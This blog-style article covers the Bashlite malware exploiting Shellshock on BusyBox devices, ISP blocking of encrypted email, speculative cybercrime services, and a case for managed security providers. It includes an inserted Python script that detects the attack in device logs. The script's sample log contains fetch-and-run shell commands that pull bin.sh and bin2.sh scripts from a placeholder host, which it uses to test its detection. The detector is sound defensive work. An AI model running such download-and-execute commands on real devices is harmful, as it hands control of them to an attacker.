Enterprise IT is a constantly changing market at the moment. IT teams are migrating whole infrastructures to the cloud, constructing colocation data centers and implementing bring-your-own-device strategies. The problem with these technological innovations is that IT professionals need a completely new array of skills. This is even more apparent in terms of cybersecurity. Because of the ever-changing IT environments, it should come as no surprise that data protection, data center security and email encryption are now offered as services that adapt to the variable landscape of cybercrime.
To begin, examine the recent trends in the cybersecurity industry. Take the Shellshock vulnerability, for example. This one exploit has been modified in many ways. Last week, one variation specifically targeted SMTP servers, and this week, cybersecurity researchers identified a new version of the Bashlite malware that utilizes the Shellshock vulnerability to give cybercriminals access to and control over any device using BusyBox, Dark Reading reported.
As a side note, BusyBox is software that provides IT teams with stripped-down Unix tools in an executable file. The creators call it "the Swiss Army Knife of Embedded Linux" because it offers so many different functions for customizing embedded systems. Developed on the Linux kernel and used on a variety of devices such as routers, BusyBox can influence a wide range of corporate systems if hacked.
In its current form, Bashlite targets BusyBox, making this malware quite dangerous. According to Dark Reading, Bashlite scans networks for machines using the software, and the malicious code attempts to log into BusyBox. At that point, it issues a command to download and run the bin.sh and bin2.sh scripts, which allows the cybercriminal to wrest control.
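A detection sketch for the behavior described above (an added example, not code from Dark Reading or the original article): it flags any source that fetches and then runs bin.sh or bin2.sh, and records how many failed logins preceded it. The key=value log format, the download tool names (wget, curl, tftp) and all addresses are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Constructed sample lines in a hypothetical key=value device audit format.
SAMPLE_LOG = """\
2000-01-01T02:10:01Z src=203.0.113.7 event=login_fail user=root
2000-01-01T02:10:02Z src=203.0.113.7 event=login_fail user=admin
2000-01-01T02:10:03Z src=203.0.113.7 event=login_ok user=root
2000-01-01T02:10:05Z src=203.0.113.7 event=cmd cmd="cd /tmp; wget http://198.51.100.9/bin.sh; sh bin.sh"
2000-01-01T02:10:09Z src=203.0.113.7 event=cmd cmd="tftp -g -r bin2.sh 198.51.100.9; chmod +x bin2.sh; ./bin2.sh"
2000-01-01T03:00:00Z src=192.0.2.50 event=login_ok user=admin
2000-01-01T03:00:04Z src=192.0.2.50 event=cmd cmd="ls /bin; cat /etc/bin.sh.bak"
2000-01-01T03:05:00Z src=192.0.2.77 event=cmd cmd="wget http://198.51.100.9/firmware.img"
"""

LINE = re.compile(r'^(\S+) src=(\S+) event=(\w+)(?: user=\S+)?(?: cmd="(.*)")?$')
# Exact script names from the report; lookarounds reject e.g. bin.sh.bak.
SCRIPT = r'(?<![\w.-])(bin2?\.sh)(?![\w.-])'
# Assumed download tools, with the script named in the same simple command.
FETCH = re.compile(r'\b(?:wget|curl|tftp)\b[^;|&]*?' + SCRIPT)
# Script run through a shell or directly, at the start of a simple command.
RUN = re.compile(r'(?:^|[;|&]\s*)(?:(?:sh|ash|bash)\s+(?:\S*/)?|\./)' + SCRIPT)

def detect(log_text):
    """Return one alert per (source, script) that was fetched and then run."""
    state = defaultdict(lambda: {"fails": 0, "login": False, "fetched": set()})
    alerts, seen = [], set()
    for line in log_text.splitlines():
        m = LINE.match(line)
        if not m:
            continue  # ignore lines outside the assumed format
        ts, src, event, cmd = m.groups()
        s = state[src]
        if event == "login_fail":
            s["fails"] += 1
        elif event == "login_ok":
            s["login"] = True
        elif event == "cmd" and cmd:
            s["fetched"].update(FETCH.findall(cmd))
            for script in RUN.findall(cmd):
                if script in s["fetched"] and (src, script) not in seen:
                    seen.add((src, script))
                    alerts.append({"time": ts, "src": src, "script": script,
                                   "failed_logins": s["fails"], "after_login": s["login"]})
    return alerts

if __name__ == "__main__":
    for alert in detect(SAMPLE_LOG):
        print(alert)
```

The fetch and the run may arrive in separate commands from the same source; the per-source state keeps the match in that case.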
Preventing email encryption
While Bashlite and similar forms of malware circumvent security by exploiting corporate systems through vulnerabilities, it was recently discovered that Internet service providers might be sabotaging email encryption. Ars Technica reported that Cricket, an AT&T subsidiary, prevented encrypted emails from being sent. However, without visibility into the problem, the individuals sending the messages would never have discovered that information was not being sent securely. This is intriguing because the ISP, or any ISP for that matter, would not stand to benefit from preventing encrypted emails from reaching their destination under protective measures. Could this be a new form of attack, and could someone be hijacking the ISP's network? It is hard to say until an investigation is conducted.
What else is out there?
The Bashlite malware and the blocking of email encryption indicate the beginning of a new era of cybersecurity. Another Dark Reading article reported on three possible future forms of cyber terrorism:
Botnet armies: With the appropriate amount of funding and teams of cybercriminals, it is possible for these hackers to compromise a large majority of computers. Once machines are under the control of a cybercriminal, they could be used to infect and infiltrate other personal computers, creating a network of machines designed to steal information.
Uber-esque cybercrime: It is common nowadays for services to connect customers with individuals who can provide help, whether that be a ride - think Uber - or help moving, like Craigslist. If someone started a cybercrime service, essentially everyone could become a cybercriminal, hiring hackers to take down networks or access corporate information.
Cybercrime-as-a-service: This scenario would allow anyone to access common tools utilized by cybercriminals. Individuals could visit a website where they select their attacks and are provided with the information necessary to launch data breach attempts. Dark Reading compared this idea to the way that people use GPS devices as a means of guiding them to their destination.
While these cybercrime services do not exist yet, the changing landscape of security could give rise to something similar.
So how does an organization protect itself?
Well, many businesses have already started on the path to protection. CRN cited an IBM study that found security budgets will increase over the next three to five years. Kris Lovejoy, general manager of IBM's security services division, told the source that the boost in spending can be attributed to organizations looking for security service providers because technology paradigms are changing so quickly. This requires partnering with companies that are not only skilled at data protection, but also at creating strong security strategies and implementing practices.
"None of us has the ability to do everything," Lovejoy explained to CRN. "The [managed security services providers] often have skill sets in an application environment or a particular concept that feeds the architecture."
Organizations already acknowledge risks when moving infrastructure to the public cloud, so why should they not consider security for every aspect of their businesses, from email encryption to data centers? Cybercriminals are going to be the first ones to find flaws in innovative IT environments, but that should not scare companies away from using new technologies. Security service providers will ensure the safety of corporate data by adapting security practices to specific environments and the ever-changing landscape of cybercrime.